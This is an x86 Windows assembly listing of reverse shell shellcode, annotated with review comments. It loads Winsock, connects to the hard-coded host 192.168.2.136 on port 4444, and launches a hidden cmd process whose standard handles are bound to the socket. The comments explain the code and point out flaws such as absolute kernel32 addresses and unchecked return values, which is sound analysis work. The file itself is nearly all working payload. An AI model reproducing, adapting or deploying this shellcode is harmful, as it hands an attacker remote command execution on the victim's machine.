; ---------------------------------------------------------------------
; shellcode.asm -- 32-bit x86 Windows listing, NASM/Intel syntax.
; Sequence (as the existing comments label it): LoadLibraryA("ws2_32"),
; GetProcAddress for WSAStartup / WSASocketA / connect, connect() to the
; hard-coded endpoint below, CreateProcessA("cmd") with all three standard
; handles set to the socket, then ExitProcess.
;
; Review notes (analysis of the code as written):
;  * kernel32 entry points are reached through absolute addresses
;    (0x75982864, 0x75981837, 0x75932062, 0x75982acf). Nothing resolves
;    them at run time, so they are only meaningful for the one kernel32.dll
;    build and load address the author captured them from.
;  * Static indicators in this listing: the endpoint 192.168.2.136:4444 and
;    the stack-built ASCII strings "ws2_32", "WSAStartup", "WSASocketA",
;    "connect", "cmd".
;  * Win32 APIs are stdcall (callee pops its arguments), which is why no
;    stack clean-up follows any of the calls.
;  * No return value is checked anywhere; every call's result is assumed
;    good (see the per-call comments).
; ---------------------------------------------------------------------
global _start
section .text
_start:
; Build "ws2_32\0\0" on the stack (dwords pushed in reverse order, each
; little-endian) and point esp at it.
xor eax, eax
mov ax, 0x3233 ; eax = 0x00003233 -> bytes "32\0\0" in memory
push eax
push dword 0x5f327377 ; bytes "ws2_" in memory
push esp ; lpLibFileName = &"ws2_32"
; LoadLibraryA -- absolute kernel32 address, see header note
mov ebx, 0x75982864 ; LoadLibraryA(libraryname)
call ebx
mov ebp, eax ; winsocket dll handle is saved into ebp (kept live for every GetProcAddress call below)
; Build "WSAStartup\0\0" and resolve it from the ws2_32 handle in ebp
xor eax, eax
mov ax, 0x7075 ; eax = 0x00007075 -> bytes "up\0\0"
push eax
push 0x74726174 ; bytes "tart"
push 0x53415357 ; bytes "WSAS"
push esp ; lpProcName = &"WSAStartup"
push ebp ; hModule = ws2_32
mov ebx, 0x75981837 ; GetProcAddress(hmodule, functionname) -- absolute kernel32 address
call ebx
; Call WSAStartup. ebx = 0x0190 (400) does double duty: size of the WSADATA
; scratch area reserved below esp, and the wVersionRequested argument.
; NOTE(review): the version word actually pushed is 0x0190, not
; MAKEWORD(2,2) = 0x0202 as the original comment claimed; WSAStartup's
; documented version negotiation is presumably what lets this still succeed.
xor ebx, ebx
mov bx, 0x0190
sub esp, ebx ; reserve 400 bytes for WSADATA (sizeof(WSADATA) is 400 on 32-bit)
push esp ; lpWSAData = scratch area
push ebx ; wVersionRequested = 0x0190
call eax ; WSAStartup(wVersionRequested, lpWSAData); result in eax is not checked
; Build "WSASocketA\0\0" and resolve it
xor eax, eax
mov ax, 0x4174 ; eax = 0x00004174 -> bytes "tA\0\0"
push eax
push 0x656b636f ; bytes "ocke"
push 0x53415357 ; bytes "WSAS"
push esp ; lpProcName = &"WSASocketA"
push ebp ; hModule = ws2_32
mov ebx, 0x75981837 ; GetProcAddress(hmodule, functionname)
call ebx
; Call WSASocketA; arguments pushed right-to-left
xor ebx, ebx
push ebx ; dwFlags = 0
push ebx ; g = 0
push ebx ; lpProtocolInfo = NULL
xor ecx, ecx
mov cl, 6
push ecx ; protocol = IPPROTO_TCP (6)
inc ebx
push ebx ; type = SOCK_STREAM (1)
inc ebx
push ebx ; af = AF_INET (2)
call eax ; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
; IPPROTO_TCP = 6, NULL,
; (unsigned int)NULL, (unsigned int)NULL);
xchg eax, edi ; Save the socket handle into edi (reused as the child's std handles below; INVALID_SOCKET is not checked)
; Build "connect\0" and resolve it. The shift supplies the terminating NUL:
; 0x74636565 >> 8 = 0x00746365 -> bytes "ect\0".
mov ebx, 0x74636565 ; bytes "eect" before the shift
shr ebx, 8 ; ebx = 0x00746365 -> bytes "ect\0"
push ebx
push 0x6e6e6f63 ; bytes "conn"
push esp ; lpProcName = &"connect"
push ebp ; hModule = ws2_32
mov ebx, 0x75981837 ; GetProcAddress(hmodule, functionname)
call ebx
; Build a sockaddr_in in place on the stack. Only the first 8 bytes
; (sin_family, sin_port, sin_addr) are written; the 8 bytes of sin_zero are
; not explicitly zeroed and are whatever already sits above them on the stack.
push 0x8802a8c0 ; sin_addr: bytes c0 a8 02 88 = 192.168.2.136 (hard-coded endpoint)
push word 0x5c11 ; sin_port: bytes 11 5c = htons(4444)
xor ebx, ebx
add bl, 2
push word bx ; sin_family = AF_INET (2)
mov edx, esp ; edx = &sockaddr_in
push byte 16 ; namelen = sizeof(sockaddr_in)
push edx ; name
push edi ; s = socket from WSASocketA
call eax ; connect(s1, (SOCKADDR*) &hax, sizeof(hax) = 16); SOCKET_ERROR is not checked
; Build the command line "cmd\0": 0x646d6363 >> 8 = 0x00646d63
mov edx, 0x646d6363
shr edx, 8 ; edx -> bytes "cmd\0"
push edx
mov ecx, esp ; ecx = lpCommandLine = &"cmd"
xor edx, edx ; edx = 0, reused as NULL/0 for every zero field and argument below
sub esp, 16 ; PROCESS_INFORMATION (16 bytes; output-only, left uninitialised)
mov ebx, esp ; PROCESS_INFORMATION
; Build STARTUPINFOA on the stack, last member first (17 dwords = 68 bytes)
push edi ; hStdError  = socket
push edi ; hStdOutput = socket
push edi ; hStdInput  = socket
push edx ; lpReserved2 = NULL
push edx ; cbReserved2 = 0 / wShowWindow = 0 (SW_HIDE)
xor eax, eax
inc eax
rol eax, 8
inc eax ; eax = 0x101
push eax ; dwFlags = STARTF_USESTDHANDLES (0x100) | STARTF_USESHOWWINDOW (0x1)
push edx ; dwFillAttribute = 0
push edx ; dwYCountChars = 0
push edx ; dwXCountChars = 0
push edx ; dwYSize = 0
push edx ; dwXSize = 0
push edx ; dwY = 0
push edx ; dwX = 0
push edx ; lpTitle = NULL
push edx ; lpDesktop = NULL
push edx ; lpReserved = NULL
xor eax, eax
add al, 44
push eax ; cb = 44 decimal (0x2c). NOTE(review): sizeof(STARTUPINFOA) is 68 (0x44), so the stored size disagrees with the 17 dwords actually laid out above
mov eax, esp ; STARTUP_INFO
; CreateProcessA arguments, right-to-left
push ebx ; PROCESS_INFORMATION
push eax ; STARTUP_INFO
push edx ; lpCurrentDirectory = NULL
push edx ; lpEnvironment = NULL
push edx ; dwCreationFlags = 0
xor eax, eax
inc eax
push eax ; bInheritHandles = TRUE -- needed for the socket std handles to reach the child
push edx ; lpThreadAttributes = NULL
push edx ; lpProcessAttributes = NULL
push ecx ; lpCommandLine = "cmd"
push edx ; lpApplicationName = NULL
mov ebx, 0x75932062 ; CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi); -- absolute kernel32 address
call ebx
end:
; Terminate; the BOOL returned by CreateProcessA becomes the exit code.
xor edx, edx
push eax ; uExitCode = CreateProcessA return value
mov eax, 0x75982acf ; ExitProcess(exitcode) -- absolute kernel32 address
call eax